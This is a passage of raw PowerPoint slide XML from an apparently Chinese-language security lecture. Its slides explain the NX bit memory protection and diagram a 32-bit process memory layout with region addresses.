          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序与操作系统的防护措施，编译时决定是否生效，由操作系统实现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通过在内存页的标识中增加“执行”位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可以表示该内存页是否可以执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>若程序代码的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>EIP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行至不可运行的内存页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>则 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>将直接拒绝执行“指令”造成程序崩溃</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68722240-77B5-466B-BAC5-2FFB6EFF22B0}"/>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内存保护措施 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>| The NX bits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72201428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Shape 1374">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A5DA647-DD17-40C0-8F42-5F9F885360A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5505940" y="1397047"/>
            <a:ext cx="5193300" cy="4734867"/>
            <a:chOff x="3771275" y="1085100"/>
            <a:chExt cx="3894975" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Shape 1375">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ED360C0-0076-43AE-B5FE-08DBFE6D67D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1212775"/>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FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>For Kernel</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Shape 1376">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04BA68F7-E71B-4C7B-B3CE-59EC58C2AA5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1486975"/>
              <a:ext cx="1363200" cy="2742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Stack</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 1377">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6FA70D-C4BA-420B-B9F5-D2F0CD5A2E47}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1761175"/>
              <a:ext cx="1363200" cy="603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867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Shape 1378">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D4E8817-DA2C-43C5-AE04-5ECAF60D3970}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="2365075"/>
              <a:ext cx="1363200" cy="44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shared libraries</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Shape 1379">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB6F4F48-BE76-458F-B4B1-B258210B9E2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="2807875"/>
              <a:ext cx="1363200" cy="603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867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Shape 1380">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863ABAE6-56DB-4A27-8D1E-97138CAC328B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3411775"/>
              <a:ext cx="1363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Heap</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Shape 1381">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED23B8A8-D327-4F72-98A6-D0F8C5B21692}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3685975"/>
              <a:ext cx="1363200" cy="274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Data</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Shape 1382">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A39990-BD4B-4922-BA48-67B641A998CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3960175"/>
              <a:ext cx="1363200" cy="2742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Text</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Shape 1383">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA78317-91AE-4D3C-AE95-1C06197F6F69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="4234375"/>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FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Unused</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Shape 1384">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D98A331F-B003-4133-9D1A-CABFFD7C2AF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="5" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5579150" y="1761175"/>
              <a:ext cx="0" cy="367800"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="Shape 1385">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{088D8FB8-845D-4E29-9847-8D00D96BDB4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="8" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5579150" y="3077575"/>
              <a:ext cx="0" cy="334200"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Shape 1386">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6363E9DF-AEE0-493D-9780-F27B819E8778}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="1085100"/>
              <a:ext cx="1047000" cy="2742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333" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0xFFFFFFFF</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Shape 1387">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6168F1E5-F016-460B-9D3D-14365F0CB522}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="1359300"/>
              <a:ext cx="1047000" cy="2742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333" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0xC0000000</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Shape 1388">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E273D0-7BA2-4CE1-B0D2-C58432A8D362}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="2674225"/>
              <a:ext cx="1047000" cy="2742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333" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x40000000</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Shape 1389">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F1CFCE-7071-4407-979C-E969CA241988}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4058550"/>
              <a:ext cx="1047000" cy="2742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333" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x08048000</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Shape 1390">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C9DA192-F45B-42DB-97EA-E5BC5597165A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1218750"/>
              <a:ext cx="358500" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Shape 1391">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC8C04F7-6D95-4BED-9D59-E69ED3613902}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1492950"/>
              <a:ext cx="358500" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Shape 1392">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29CD1FE8-8BC9-4841-B565-DAED513B50DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="2807875"/>
              <a:ext cx="358500" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Shape 1393">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB3B58A-F753-4F18-AB6A-B4F842CC0B40}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4221500"/>
              <a:ext cx="358500" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Shape 1394">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092B6566-C748-4F94-B9BD-E11B297E20AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4495700"/>
              <a:ext cx="358500" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Shape 1395">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D994AF33-1178-4AA2-8E26-071FECC7A92A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4362050"/>
              <a:ext cx="1047000" cy="2742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333" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
